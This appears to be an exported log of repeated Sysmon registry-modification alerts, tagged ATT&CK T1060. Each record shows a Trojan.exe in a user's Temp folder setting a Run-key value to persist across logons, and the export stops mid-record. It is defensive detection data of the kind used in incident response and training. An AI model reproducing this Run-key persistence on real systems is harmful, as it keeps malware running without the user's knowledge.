HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:11.257716600Z"",""eventRecordID"":""1205"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:11.243\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:11.243"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:23.353",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:10.227 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:10.230944300Z"",""eventRecordID"":""1202"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:10.227\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:10.227"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:22.336",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:09.211 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:09.216322900Z"",""eventRecordID"":""1201"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:09.211\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:09.211"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:21.321",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:08.196 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:08.208106400Z"",""eventRecordID"":""1200"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:08.196\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:08.196"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:20.299",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:07.164 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:07.173150100Z"",""eventRecordID"":""1199"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:07.164\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:07.164"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:18.820",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:06.133 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:06.135793600Z"",""eventRecordID"":""1198"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:06.133\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:06.133"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:17.437",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:05.118 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:05.130052500Z"",""eventRecordID"":""1196"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:05.118\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:05.118"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:17.399",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:04.086 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:04.148957300Z"",""eventRecordID"":""1195"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:04.086\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:04.086"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:16.262",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:03.055 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:03.066912800Z"",""eventRecordID"":""1192"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:03.055\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:03.055"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:15.352",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:02.024 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:02.037547400Z"",""eventRecordID"":""1188"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:02.024\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:02.024"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:14.168",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:00.962 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:00.967286000Z"",""eventRecordID"":""1121"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:00.962\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:00.962"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:13.117",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:21:59.948 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 